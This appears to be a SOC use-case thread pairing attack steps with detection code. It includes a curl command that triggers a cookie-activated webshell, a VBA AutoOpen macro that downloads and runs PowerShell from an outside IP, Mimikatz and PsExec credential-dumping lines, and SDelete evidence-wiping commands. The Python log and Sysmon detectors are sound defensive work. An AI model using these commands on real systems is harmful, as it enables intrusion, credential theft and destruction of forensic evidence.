SOC Usecase
  • #1
    Activate WebShell via special cookie

    Code:
    curl --cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami
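    Added detection example for this use case (not code from the post): it parses web-server access log lines and flags requests that combine the DSLogdSession cookie with a cmd= parameter on the ccupdate.cgi path. The log format is an assumption (Combined Log Format with the Cookie header appended, as Apache's %{Cookie}i would produce) and the sample lines are constructed.

```python
"""Flag requests matching the cookie-triggered webshell pattern in web access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log format: Combined Log Format plus a trailing quoted Cookie header.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

TRIGGER_COOKIE = "DSLogdSession"             # cookie name from the post
WEBSHELL_PATH = "/dana-na/cc/ccupdate.cgi"   # CGI path from the post

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" '
    '200 1532 "-" "Mozilla/5.0" "DSSIGNIN=url_default"',
    '203.0.113.9 - - [12/Mar/2024:10:02:15 +0000] "GET /home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami HTTP/1.1" '
    '200 48 "-" "curl/8.4.0" "DSLogdSession=xyz"',
    '203.0.113.9 - - [12/Mar/2024:10:02:40 +0000] "GET /home/webserver/htdocs/dana-na/cc/ccupdate.cgi HTTP/1.1" '
    '200 12 "-" "curl/8.4.0" "DSLogdSession=xyz"',
]


def parse_line(line):
    """Parse one access log line into a dict with path, query and cookie maps; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["uri"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    rec["cookies"] = dict(c.strip().split("=", 1) for c in rec["cookie"].split(";") if "=" in c)
    return rec


def classify(rec):
    """Severity for a parsed record: 'critical' for cookie + cmd, 'suspicious' for one of them, else None."""
    if not rec["path"].endswith(WEBSHELL_PATH):
        return None
    has_cmd = "cmd" in rec["query"]
    has_cookie = TRIGGER_COOKIE in rec["cookies"]
    if has_cmd and has_cookie:
        return "critical"      # the exact pattern shown in the post
    if has_cmd or has_cookie:
        return "suspicious"    # partial match: same CGI with only the cookie or only the command
    return None


def scan(lines):
    """Return (severity, source_ip, path, cmd_value) for every line that matches."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sev = classify(rec)
        if sev:
            hits.append((sev, rec["src"], rec["path"], rec["query"].get("cmd")))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

    Access logs do not record request cookies by default, so the first step in practice is enabling that field on the reverse proxy or appliance; without it, only the cmd= parameter on that CGI path is visible.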

  • #2
    APT-1 attacks on Westinghouse Electric Company

    [ Initial Access ]
    - phishing
    - Word with VBA, macro enabled

    Code:
    Sub AutoOpen()
        Dim objShell As Object
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
    End Sub

    Dropper: C:\Users\Public\chrome_upd.exe

    [ Persist ]
    Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

    POST request every 30s to http://updater[.]info/report.php

    [ Lateral Movement ]
    PsExec + Mimikatz

    Code:
    .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    psexec.exe \\TARGET -u admin -p password cmd.exe

    [ Data Gathering and Exfiltration ]
    powershell + RAR

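    Added detection example for the persistence/C2 part of this use case (not code from the post): the dropper's "POST every 30s" is a periodic beacon, and the check below finds it in proxy logs by grouping requests per (source, host, path) and flagging groups whose inter-request gaps have a stable period and low jitter. The log line layout and all sample lines are constructed assumptions; the updater.info/report.php indicator is the post's own.

```python
"""Periodic-beacon detection over proxy log lines (constructed sample data)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Assumed line layout: "<ISO timestamp> <src ip> <method> <host> <path>".
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+)$")

# Constructed sample: one host beaconing about every 30 s (as in the post), one host browsing normally.
SAMPLE_PROXY_LOG = [
    "2024-03-12T09:00:00 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:00:30 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:01:01 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:01:30 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:02:00 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:02:31 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:03:00 10.1.1.20 POST updater.info /report.php",
    "2024-03-12T09:00:05 10.1.1.21 GET example.com /",
    "2024-03-12T09:00:09 10.1.1.21 GET example.com /news",
    "2024-03-12T09:03:44 10.1.1.21 GET example.com /about",
    "2024-03-12T09:10:12 10.1.1.21 GET example.com /contact",
    "2024-03-12T09:10:13 10.1.1.21 GET example.com /static/app.js",
]


def group_requests(lines):
    """Collect request timestamps per (src, host, path); unparseable lines are skipped."""
    groups = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        groups[(m["src"], m["host"], m["path"])].append(datetime.fromisoformat(m["ts"]))
    return groups


def beacon_score(times):
    """Return (median_gap_seconds, jitter) for a list of timestamps, or None with fewer than 3."""
    times = sorted(times)
    if len(times) < 3:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    median = statistics.median(gaps)
    if median <= 0:
        return None
    jitter = statistics.pstdev(gaps) / median   # coefficient of variation: ~0 for a fixed sleep
    return median, jitter


def find_beacons(lines, min_requests=5, max_jitter=0.2):
    """Flag (src, host, path) groups with enough requests and a regular period."""
    hits = []
    for (src, host, path), times in group_requests(lines).items():
        if len(times) < min_requests:
            continue
        score = beacon_score(times)
        if score and score[1] <= max_jitter:
            hits.append({"src": src, "host": host, "path": path, "count": len(times),
                         "period_s": score[0], "jitter": round(score[1], 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_PROXY_LOG):
        print(hit)
```

    A real implant may add random sleep jitter, so the max_jitter threshold and the minimum request count are tuning knobs; the same grouping also works on firewall or DNS logs where only the destination, not the path, is available.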


  • #3
    Auditd and Log Forwarders Status

    coming soon .....



  • #4
    Sysinternals Tools - SDelete ( Anti Forensic )
    -----------

    Scenario: After privilege escalation on a Windows server, an operator wants to hide evidence of tool staging and exfil scripts.

    Actions with SDelete:

    Code:
    sdelete -p 5 C:\Users\Admin\Desktop\payload.exe
    sdelete -z C:
      • Securely wipes dropped payloads.
      • Cleans free space to erase deleted traces.
    • Goal: Make forensic recovery of tools and temp artifacts much harder.

    ⚠️ Limitation: On SSDs, due to wear leveling, deleted data may still persist in flash cells.

    ------------
    Blue Team (Defensive / Detection & Response)
    • Why monitor? Attackers or insiders may use SDelete to wipe logs or payloads.
    • Detection methods:
      • Process Creation Logs (Sysmon Event ID 1, Windows Event ID 4688):
        • Look for execution of sdelete.exe or renamed copies.
        • Example Splunk SPL:
          Code:
          index=windows (process_name="sdelete.exe" OR command_line="*sdelete*")
      • Unusual Disk Activity:
        • Sudden large writes to free space (-z / -c flags).
        • Disk I/O spikes without corresponding business processes.
      • Fileless Detection:
        • Monitor for tools dropped in C:\Windows\Temp\ or user profile paths, then executed.
    • Prevention:
      • Block Sysinternals tools not needed for business via AppLocker / WDAC.
      • Alert on unauthorized use in servers and critical endpoints.


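    Added detection example for the process-creation part of the blue team section (not code from the post): the SPL above matches on the image name or command line, and this check goes one step further by also using the PE OriginalFileName field that Sysmon Event ID 1 records, which still reads sdelete.exe / sdelete64.exe when the binary has been renamed, and by raising severity when the -z / -c free-space wipe flags appear. The events below are constructed sample records carrying a subset of the real Sysmon field names.

```python
"""Detect SDelete execution, including renamed copies, in Sysmon Event ID 1 records."""
import re
import ntpath

# Sysinternals binary names as shipped (OriginalFileName in the PE version resource).
SDELETE_NAMES = {"sdelete.exe", "sdelete64.exe"}
# -z / -c wipe free space on a volume: the "unusual disk activity" case from the post.
FREE_SPACE_FLAGS = re.compile(r"(?:^|\s)-[zc](?:\s|$)")

# Constructed sample events (field names follow Sysmon Event ID 1; values are made up).
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\sdelete.exe", "OriginalFileName": "sdelete.exe",
     "Description": "Secure file delete",
     "CommandLine": r"sdelete -p 5 C:\Users\Admin\Desktop\payload.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\admin"},
    {"Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "sdelete64.exe",
     "Description": "Secure file delete",
     "CommandLine": r"svchost.exe -z C:",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": "CORP\\admin"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "Description": "Host Process for Windows Services",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe", "User": "NT AUTHORITY\\SYSTEM"},
]


def detect_sdelete(event):
    """Return an alert dict for an SDelete execution, or None for anything else."""
    image_name = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if image_name in SDELETE_NAMES:
        reasons.append("image name is sdelete")
    if original in SDELETE_NAMES:
        # PE metadata survives a rename, so this catches the "renamed copies" case.
        if image_name != original:
            reasons.append(f"renamed copy: OriginalFileName={original} Image={image_name}")
        else:
            reasons.append("OriginalFileName is sdelete")
    if "sdelete" in cmd.lower() and not reasons:
        reasons.append("command line mentions sdelete")
    if not reasons:
        return None
    # Wiping free space on a whole volume is the stronger anti-forensic signal.
    severity = "high" if FREE_SPACE_FLAGS.search(cmd) else "medium"
    return {"severity": severity, "user": event.get("User"),
            "parent": ntpath.basename(event.get("ParentImage", "")),
            "command": cmd, "reasons": reasons}


def scan_events(events):
    """Run the detection over a list of events and keep only the alerts."""
    return [alert for alert in (detect_sdelete(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

    In a SIEM the same logic maps onto the Sysmon fields directly (Image, OriginalFileName, CommandLine), which is why forwarding Sysmon Event ID 1 rather than only 4688 matters here: 4688 has no OriginalFileName, so a renamed sdelete only shows up through its command-line flags.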